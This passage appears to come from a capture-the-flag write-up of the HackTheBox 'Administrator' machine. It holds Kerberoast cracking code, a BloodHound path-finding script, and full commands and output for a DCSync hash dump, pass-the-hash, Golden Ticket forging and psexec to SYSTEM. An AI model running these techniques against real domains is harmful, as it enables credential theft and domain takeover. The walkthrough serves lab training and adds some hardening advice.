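    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, confounder + plaintext)


def rc4_hmac_check(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """What a cracker does per candidate: derive k3 from the checksum, decrypt, re-MAC."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plain = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum)


def krb5tgs23_line(user: str, realm: str, spn: str, checksum: bytes, edata: bytes) -> str:
    """hashcat -m 13100 line format."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def parse_krb5tgs23_line(line: str):
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("not an etype-23 TGS-REP line")
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    return bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, wordlist, usage: int = 2):
    checksum, edata = parse_krb5tgs23_line(line)
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), usage, checksum, edata):
            return candidate
    return None


# Constructed inputs: fixed confounder (real: 8 random bytes) and a stand-in for the
# DER EncTicketPart (0x63 = APPLICATION 3 tag), so the forged line is reproducible.
CONFOUNDER = bytes(range(8))
FAKE_ENC_TICKET_PART = b"\x63\x81\x40\x30\x81\x3d" + bytes(61)
WORDLIST = ["Liverpool", "iheartyou", "ginuwine", "limpbizkit", "Pass@1234"]  # constructed


def forge_roast_line(password: str, user="ethan", realm="ADMINISTRATOR.HTB",
                     spn="administrator.htb/ethan") -> str:
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), 2, CONFOUNDER, FAKE_ENC_TICKET_PART)
    return krb5tgs23_line(user, realm, spn, checksum, edata)


if __name__ == "__main__":
    print("cracked:", crack(forge_roast_line("limpbizkit"), WORDLIST))
```

Contrast this with the AES etypes (17/18): those keys come from PBKDF2-HMAC-SHA1 with 4096 iterations over a salt built from the realm and principal name, so the same wordlist costs orders of magnitude more per candidate. That is why roasting tools ask for an RC4 ticket whenever the target account still allows it, and why restricting service accounts to AES (msDS-SupportedEncryptionTypes) and giving them long random passwords is the fix.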

Revisiting BloodHound

The user ethan has the following privileges on the domain object:

  • DS-Replication-Get-Changes
  • DS-Replication-Get-Changes-In-Filtered-Set
  • DS-Replication-Get-Changes-All

The first and the third together allow a DCSync attack (the Filtered-Set right is not required for it).

[Screenshot: BloodHound showing ethan's replication rights on administrator.htb]
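To make the ACL reasoning in this section and in the Think Box above concrete, here is an added example, not from the walkthrough, BloodHound or bloodyAD, that encodes which abuse each right permits on a user object and walks the chain from an owned account to DCSync. The edge list is constructed from what BloodHound showed on this box (plus one constructed decoy holding only the Filtered-Set right); the abuse table encodes standard AD semantics, which is also why a forced password reset through GenericWrite alone does not work: that right does not include the User-Force-Change-Password extended right.

```python
"""Which abuse each ACL right permits on a user object, and the chain from an
owned account to DCSync.  Added example: not from the walkthrough, BloodHound
or bloodyAD.  Edges are constructed from this box's BloodHound findings plus
one decoy; the abuse table encodes standard AD semantics."""
from collections import deque

# Abuse primitives available against a *user* object per right (BloodHound edge names).
# GenericWrite lacks the User-Force-Change-Password extended right, so no reset.
# ShadowCredentials additionally needs a DC that accepts PKINIT (normally via AD CS),
# so holding the right does not guarantee the abuse works.
USER_ABUSES = {
    "GenericAll":           {"ForceChangePassword", "ShadowCredentials", "TargetedKerberoast"},
    "GenericWrite":         {"ShadowCredentials", "TargetedKerberoast"},
    "ForceChangePassword":  {"ForceChangePassword"},
    "AddKeyCredentialLink": {"ShadowCredentials"},
    "WriteSPN":             {"TargetedKerberoast"},
}
# Replication rights on the domain object; both are needed for DCSync, Filtered-Set is not.
DCSYNC_REQUIRED = {"GetChanges", "GetChangesAll"}

# Constructed edges (source, right, target) mirroring the walkthrough's BloodHound findings.
EDGES = [
    ("OLIVIA", "GenericAll", "MICHAEL"),
    ("MICHAEL", "ForceChangePassword", "BENJAMIN"),
    ("EMILY", "GenericWrite", "ETHAN"),
    ("ETHAN", "GetChanges", "ADMINISTRATOR.HTB"),
    ("ETHAN", "GetChangesAll", "ADMINISTRATOR.HTB"),
    ("ETHAN", "GetChangesInFilteredSet", "ADMINISTRATOR.HTB"),
    ("ALEXANDER", "GetChangesInFilteredSet", "ADMINISTRATOR.HTB"),  # decoy: looks close, is not DCSync
]


def abuses_for(right):
    return set(USER_ABUSES.get(right, ()))


def can_dcsync(principal, edges, domain):
    rights = {r for s, r, t in edges if s == principal and t == domain}
    return DCSYNC_REQUIRED <= rights


def takeover_adjacency(edges):
    """source -> [(target, right)] for edges that give control of the target account."""
    adj = {}
    for s, r, t in edges:
        if abuses_for(r):
            adj.setdefault(s, []).append((t, r))
    return adj


def reachable(owned, edges):
    """Every account that can be taken over starting from `owned`."""
    adj, seen, stack = takeover_adjacency(edges), set(), [owned]
    while stack:
        for nxt, _ in adj.get(stack.pop(), []):
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen


def escalation_path(owned, edges, domain):
    """Shortest chain [(principal, right used), ...] from `owned` to a DCSync-capable
    principal, ending with the domain; None if no reachable account has the rights."""
    adj = takeover_adjacency(edges)
    queue, seen = deque([(owned, [(owned, "OWNED")])]), {owned}
    while queue:
        node, path = queue.popleft()
        if can_dcsync(node, edges, domain):
            return path + [(domain, "DCSync")]
        for nxt, right in adj.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(nxt, right)]))
    return None


if __name__ == "__main__":
    for user in ("OLIVIA", "EMILY"):
        print(user, "->", sorted(reachable(user, EDGES)),
              escalation_path(user, EDGES, "ADMINISTRATOR.HTB"))
```

Run it and olivia's chain stops at benjamin (no path to replication rights from that side), while emily reaches ethan and from there the domain, which is exactly the route the rest of this walkthrough takes.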

DCSync Attack

In this attack, the attacker impersonates a domain controller and asks the real DC to replicate directory objects over DRSUAPI (the MS-DRSR GetNCChanges call), which returns the account secrets normally stored in NTDS.dit, including every NT hash and Kerberos key.

I used secretsdump to perform the DCSync attack and dump the domain secrets. The RemoteOperations error at the top is expected: secretsdump first tries the remote-registry route, which needs local admin on the DC, and then falls back to the DRSUAPI method, which is exactly what ethan's replication rights permit:

croc@hacker$ impacket-secretsdump administrator.htb/'ethan':'limpbizkit'@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htb\michael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htb\michael:des-cbc-md5:43c2bc231598012a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htb\benjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up... 

Domain Admin

Finally, with the Administrator NT hash in hand we can pass the hash to WinRM and land on the DC as the Domain Administrator, no password required:

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'    
[sudo] password for croc: 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f2ef42************************

Post Root

Golden Ticket

I wanted to delve deeper into the box by exploring some persistence techniques, so I decided to give the Golden Ticket a shot. That's when my friend/mentor, 0xCOFFEE, came to my rescue; the following note from him really helped me achieve this.

Pass the Ticket | 0xBEN | Notes (notes.benheater.com)

Prerequisites

In order to forge a Golden Ticket, we require the following:

  1. The krbtgt account's key (its NT hash or, preferably, an AES key)
  2. The domain SID
  3. The domain name

We already have the krbtgt keys from the DCSync attack above. I used the AES128 key below; the AES256 key works the same way and matches what modern Windows issues by default, whereas an RC4 (NT hash) ticket stands out more to defenders.

Step #01: Domain SID

I used impacket-lookupsid with the Administrator hash to get the domain SID. This step doesn't actually need admin: lookupsid brute-forces SIDs over LSARPC and works with any domain account, and the domain SID is also the prefix of the SID that whoami /user prints in any of the earlier WinRM shells:

croc@hacker:~$ impacket-lookupsid -hashes 'aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e' 'administrator.htb/administrator@10.10.11.42'         
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.11.42
[*] StringBinding ncacn_np:10.10.11.42[pipelsarpc]
[*] Domain SID is: S-1-5-21-1088858960-373806567-254189436
498: ADMINISTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ADMINISTRATOR\Administrator (SidTypeUser)
501: ADMINISTRATOR\Guest (SidTypeUser)
502: ADMINISTRATOR\krbtgt (SidTypeUser)
512: ADMINISTRATOR\Domain Admins (SidTypeGroup)
513: ADMINISTRATOR\Domain Users (SidTypeGroup)
514: ADMINISTRATOR\Domain Guests (SidTypeGroup)
515: ADMINISTRATOR\Domain Computers (SidTypeGroup)
516: ADMINISTRATOR\Domain Controllers (SidTypeGroup)
517: ADMINISTRATOR\Cert Publishers (SidTypeAlias)
518: ADMINISTRATOR\Schema Admins (SidTypeGroup)
519: ADMINISTRATOR\Enterprise Admins (SidTypeGroup)
520: ADMINISTRATOR\Group Policy Creator Owners (SidTypeGroup)
521: ADMINISTRATOR\Read-only Domain Controllers (SidTypeGroup)

Step#2: Generate the Ticket

Further, I used the impacket-ticketer to generate the ticket:

croc@hacker:~$ impacket-ticketer -aesKey 'aadb89e07c87bcaf9c540940fab4af94' -domain-sid 'S-1-5-21-1088858960-373806567-254189436' -domain 'administrator.htb' -dc-ip '10.10.11.42' -user-id '500' 'Administrator'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for administrator.htb/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Here:

  • -aesKey: the krbtgt account's AES key (32 hex characters selects AES128, 64 selects AES256)
  • -domain-sid: the domain SID from lookupsid
  • -user-id: the RID to place in the ticket (500 is the built-in Administrator)

Step#3: Test Out!

KRB5CCNAME points impacket at the forged ccache, and -k -no-pass makes psexec authenticate with that ticket instead of a password. The faketime wrapper matters: the DC runs almost seven hours ahead of my box (the clock skew nmap reported), and both the ticket's timestamps and the Kerberos authenticator must fall within the KDC's five-minute tolerance, so the command runs with the local clock set to the DC's time as read by ntpdate -q. It worked flawlessly; the shell lands as SYSTEM because psexec runs its payload as a service:

croc@hacker:~$ KRB5CCNAME=Administrator.ccache faketime "$(ntpdate -q dc.administrator.htb | cut -d ' ' -f 1,2)" impacket-psexec -k -no-pass -dc-ip 10.10.11.42 'administrator.htb/administrator@DC.administrator.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on DC.administrator.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YwxhjLVC.exe
[*] Opening SVCManager on DC.administrator.htb.....
[*] Creating service oZXF on DC.administrator.htb.....
[*] Starting service oZXF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
